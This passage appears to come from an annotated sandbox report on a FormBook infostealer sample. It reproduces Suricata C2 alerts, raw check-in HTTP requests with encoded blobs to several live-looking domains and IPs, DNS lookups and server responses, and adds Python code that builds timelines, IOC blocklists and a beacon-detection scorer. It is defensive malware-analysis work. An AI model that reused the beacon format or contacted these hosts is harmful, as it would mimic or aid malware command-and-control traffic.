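    r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")

# The text after "Suricata IDS:" on eight of the report's Networking lines.
NETWORK_LINES = """\
2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 5.44.111.162:80
2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.160.0.106:80
2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 217.160.0.106:80
2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 217.160.0.106:80
2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 217.160.0.106:80
2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 208.91.197.27:80
2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 208.91.197.27:80
2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 208.91.197.27:80
""".splitlines()

# (timestamp, SID, source port) for the same connections, from the alert table.
ALERT_TABLE = [
    ("2024-08-23T04:18:27.482705+0200", 2050745, 49736),
    ("2024-08-23T04:18:43.216056+0200", 2855464, 49737),
    ("2024-08-23T04:18:45.757577+0200", 2855464, 49738),
    ("2024-08-23T04:18:48.408334+0200", 2855464, 49739),
    ("2024-08-23T04:18:51.068512+0200", 2050745, 49740),
    ("2024-08-23T04:19:13.014934+0200", 2855464, 49742),
    ("2024-08-23T04:19:15.545135+0200", 2855464, 49743),
    ("2024-08-23T04:19:22.189090+0200", 2050745, 49745),
]


def parse_alert(line: str) -> dict:
    """One Networking line -> fields; the HTTP method is read off the message."""
    m = ALERT_RE.search(line)
    if not m:
        raise ValueError("unrecognised alert line: %r" % line)
    d = m.groupdict()
    for k in ("sid", "sev", "sport", "dport"):
        d[k] = int(d[k])
    d["method"] = "POST" if "(POST)" in d["msg"] else "GET" if "(GET)" in d["msg"] else "?"
    return d


def timeline(net_lines, table) -> list:
    """Chronological (timestamp, method, dst_ip) rows, joined on source port.
    Rows whose SID disagrees between the two sources are dropped, not guessed."""
    by_port = {a["sport"]: a for a in map(parse_alert, net_lines)}
    rows = []
    for ts, sid, sport in table:
        a = by_port.get(sport)
        if a is None or a["sid"] != sid:
            continue
        rows.append((ts, a["method"], a["dst"]))
    return sorted(rows)


def c2_summary(net_lines) -> dict:
    """dst_ip -> {"GET": n, "POST": n}.  The report's two SIDs are the GET
    and POST variants of the same check-in, so both should appear per host."""
    out = defaultdict(lambda: {"GET": 0, "POST": 0})
    for a in map(parse_alert, net_lines):
        out[a["dst"]][a["method"]] += 1
    return dict(out)


def ioc_lines(net_lines) -> list:
    """Sorted, de-duplicated destination IPs for a blocklist or watchlist."""
    return sorted({a["dst"] for a in map(parse_alert, net_lines)})


if __name__ == "__main__":
    for row in timeline(NETWORK_LINES, ALERT_TABLE):
        print(*row)
    print(c2_summary(NETWORK_LINES))
    print("\n".join(ioc_lines(NETWORK_LINES)))
```

On the full report the same code yields ten destination IPs, and the per-host pattern (three POSTs, then a GET, on consecutive ports) is visible in the summary. Treat every IP as a candidate only: FormBook rotates through a list of decoy hosts alongside the live one, and the report itself labels only some of the domains as malicious.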
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 occurrences)
Source: C:\Users\user\Desktop\proforma invoice.exe, Code function 0_2_00B1CE44: InternetReadFile, SetEvent, GetLastError, SetEvent
Source: global traffic, HTTP traffic detected: GET /w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.hprlz.cz | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /qe66/?AZOTcfex=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&bB7L5=DPt0-rQpMXpt HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.catherineviskadi.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /xzzi/?bB7L5=DPt0-rQpMXpt&AZOTcfex=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.bfiworkerscomp.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /rm91/?bB7L5=DPt0-rQpMXpt&AZOTcfex=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.xn--fhq1c541j0zr.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /4hda/?AZOTcfex=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&bB7L5=DPt0-rQpMXpt HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.xn--matfrmn-jxa4m.se | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /li0t/?bB7L5=DPt0-rQpMXpt&AZOTcfex=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.anuts.top | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /ei85/?AZOTcfex=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.telwisey.info | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /aroo/?bB7L5=DPt0-rQpMXpt&AZOTcfex=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s= HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.sandranoll.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /tf44/?AZOTcfex=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&bB7L5=DPt0-rQpMXpt HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.gipsytroya.com | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /lfkn/?AZOTcfex=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&bB7L5=DPt0-rQpMXpt HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Host: www.dmtxwuatbz.cc | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.hprlz.cz
Source: global traffic, DNS traffic detected: DNS query: www.catherineviskadi.com
Source: global traffic, DNS traffic detected: DNS query: www.hatercoin.online
Source: global traffic, DNS traffic detected: DNS query: www.fourgrouw.cfd
Source: global traffic, DNS traffic detected: DNS query: www.bfiworkerscomp.com
Source: global traffic, DNS traffic detected: DNS query: www.tinmapco.com
Source: global traffic, DNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
Source: global traffic, DNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
Source: global traffic, DNS traffic detected: DNS query: www.anuts.top
Source: global traffic, DNS traffic detected: DNS query: www.telwisey.info
Source: global traffic, DNS traffic detected: DNS query: www.sandranoll.com
Source: global traffic, DNS traffic detected: DNS query: www.gipsytroya.com
Source: global traffic, DNS traffic detected: DNS query: www.helpers-lion.online
Source: global traffic, DNS traffic detected: DNS query: www.dmtxwuatbz.cc
Source: unknown, HTTP traffic detected: POST /qe66/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-us | Accept-Encoding: gzip, deflate, br | Host: www.catherineviskadi.com | Origin: http://www.catherineviskadi.com | Cache-Control: max-age=0 | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 205 | Referer: http://www.catherineviskadi.com/qe66/ | User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | Data Ascii (205 bytes): AZOTcfex=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
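The requests above share one shape across ten different hosts: a four-character directory (/w6qg/, /qe66/, /xzzi/, ...), a query with exactly two parameters whose names (bB7L5, AZOTcfex) and short value (DPt0-rQpMXpt) never change while the long base64 value does, Connection: close, and a single User-Agent; the one POST sends the same kind of blob as a form body to the same path, with Origin and Referer pointing back at the target host. FormBook is known to cycle through decoy domains alongside its real C2, which is consistent with most of the hosts answering 404 or with a domain-parking page below. The following is an added example, not Joe Sandbox code and not FormBook's own code: it parses raw HTTP requests, scores them on those structural features rather than on the User-Agent alone, and clusters flagged hosts by the shared short id so the decoy set can be pivoted on. The sample requests are rebuilt from the report's values with CRLF header lines restored; the benign example.com request, the scoring thresholds, and the 64-character blob minimum are assumptions made for this example.

```python
import re
from collections import defaultdict

# Header values copied from the report. The Accept line is identical on every
# request; the User-Agent is fixed for this sample, not a FormBook invariant.
REPORT_UA = ("Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36")
REPORT_ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,"
                 "image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")        # /w6qg/, /qe66/, /xzzi/ ...
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")   # raw base64, not URL-encoded

def parse_request(raw):
    """Split one raw HTTP/1.1 request into method, path, query, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _ = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}

def split_params(encoded):
    """k=v&k=v split with no decoding: '+' and '/' inside the blob are base64
    characters, and urllib.parse.parse_qs would turn every '+' into a space."""
    return [tuple(part.partition("=")[::2]) for part in encoded.split("&") if part]

def classify_params(pairs):
    """Find the <short id> + <base64 blob> pair the report shows, in either order."""
    short_id = blob = None
    for _, value in pairs:
        if len(value) >= 64 and B64_RE.match(value):   # assumed minimum blob length
            blob = value
        elif 8 <= len(value) <= 20 and "-" in value:
            short_id = value
    return short_id, blob

def score_request(req):
    """Return (score, reasons, short_id); the thresholds are this example's assumption."""
    h, reasons, short_id = req["headers"], [], None
    host = h.get("host", "")
    if h.get("user-agent") == REPORT_UA:
        reasons.append("sample user-agent")
    if PATH_RE.match(req["path"]):
        reasons.append("4-char path")
    if h.get("connection", "").lower() == "close":
        reasons.append("connection: close")
    if req["method"] == "GET":
        short_id, blob = classify_params(split_params(req["query"]))
        if short_id and blob:
            reasons.append("id+blob query")
    elif req["method"] == "POST":
        _, blob = classify_params(split_params(req["body"]))
        if blob and h.get("content-type", "").startswith("application/x-www-form-urlencoded"):
            reasons.append("blob form body")
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{req['path']}":
            reasons.append("self-referencing origin/referer")
    return len(reasons), reasons, short_id

def triage(raw_requests, threshold=3):
    """Flag beacon candidates and cluster the flagged hosts by the shared short id."""
    flagged, by_id = [], defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        score, reasons, short_id = score_request(req)
        if score >= threshold:
            host = req["headers"].get("host", "")
            flagged.append({"method": req["method"], "host": host, "path": req["path"],
                            "score": score, "reasons": reasons})
            if short_id:
                by_id[short_id].add(host)
    return flagged, dict(by_id)

def get_request(host, path, query):
    # Rebuild a GET with the header set the report shows (constructed input).
    return (f"GET {path}?{query} HTTP/1.1\r\nAccept: {REPORT_ACCEPT}\r\nAccept-Language: en-us\r\n"
            f"Host: {host}\r\nConnection: close\r\nUser-Agent: {REPORT_UA}\r\n\r\n")

def post_request(host, path, body):
    # Rebuild the POST the report shows (constructed input).
    return (f"POST {path} HTTP/1.1\r\nAccept: {REPORT_ACCEPT}\r\nAccept-Language: en-us\r\n"
            f"Accept-Encoding: gzip, deflate, br\r\nHost: {host}\r\nOrigin: http://{host}\r\n"
            f"Cache-Control: max-age=0\r\nConnection: close\r\n"
            f"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: {len(body)}\r\n"
            f"Referer: http://{host}{path}\r\nUser-Agent: {REPORT_UA}\r\n\r\n{body}")

ID = "bB7L5=DPt0-rQpMXpt"   # same parameter name and value on every GET in the report
SAMPLE_REQUESTS = [
    get_request("www.hprlz.cz", "/w6qg/", ID + "&AZOTcfex=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo="),
    get_request("www.catherineviskadi.com", "/qe66/", "AZOTcfex=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&" + ID),
    get_request("www.bfiworkerscomp.com", "/xzzi/", ID + "&AZOTcfex=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4="),
    post_request("www.catherineviskadi.com", "/qe66/", "AZOTcfex=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ=="),
    # Assumed benign request (not from the report) to show a non-match.
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nConnection: keep-alive\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36\r\n\r\n",
]

if __name__ == "__main__":
    hits, clusters = triage(SAMPLE_REQUESTS)
    for hit in hits:
        print(f"{hit['method']} {hit['host']}{hit['path']} score={hit['score']} {hit['reasons']}")
    print("hosts sharing the id:", clusters)
```

Two points worth keeping in mind when adapting this to real proxy or PCAP data: the blob must be read before any URL decoding, because the '+' characters in it are base64 and a generic query parser silently turns them into spaces and breaks the alphabet check; and the rebuilt POST's Content-Length comes out as 205, the same value the report shows, which is a cheap sanity check that the reconstruction matches the capture.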
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Fri, 23 Aug 2024 02:18:43 GMT | Server: Apache | Content-Encoding: gzip | Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: not printable (the body is a single 0x189-byte chunk of gzip-compressed HTML, magic bytes 1f 8b 08). The report logs two further responses at 02:18:45 and 02:18:48 GMT that are byte-identical to this one apart from the Date header.
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 626 | Connection: close | Date: Fri, 23 Aug 2024 02:18:50 GMT | Server: Apache | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 23 Aug 2024 02:27:29 GMT | Server: Apache | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html> (the /rm91/ path is the one requested from www.xn--fhq1c541j0zr.com above). The report logs three further responses at 02:27:32, 02:27:34 and 02:27:37 GMT that are identical to this one apart from the Date header.
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 23 Aug 2024 02:20:41 GMT | Server: Apache | Content-Length: 16026 | Connection: close | Content-Type: text/html | Data Ascii (decoded from the raw bytes the report shows, which cover only the start of the 16026-byte body; whitespace collapsed): <!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"> <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"> </head> <body> <!-- partial:index.partial.html --> <div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button> </div> <main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> [truncated in the report]. The report logs two further responses with the same headers and body at 02:20:43 GMT and at 02:20:46 GMT; the latter differs only in carrying Content-Type: text/html; charset=utf-8.
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 23 Aug 2024 02:20:52 GMT | Server: Apache/2.4.61 (Debian) | X-Powered-By: PHP/7.4.33 | Strict-Transport-Security: max-age=63072000; preload | Connection: Upgrade, close | Transfer-Encoding: chunked | Content-Type: text/html; charset=UTF-8 | Data Ascii (decoded from the raw bytes the report shows, first chunk size 0xcb3; whitespace collapsed): <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Domain www.sandranoll.com is registered by Domaintechnik®</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /> </head> <body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, [truncated in the report; the German reads "As the domain holder you can manage your domains online,"]. This is a registrar parking page for www.sandranoll.com (the /aroo/ request above), served from the DOMAINTECHNIKAT ASN listed above.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:20:54 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:20:57 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 23 Aug 2024 02:20:59 GMTServer: Apache/2.4.61 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
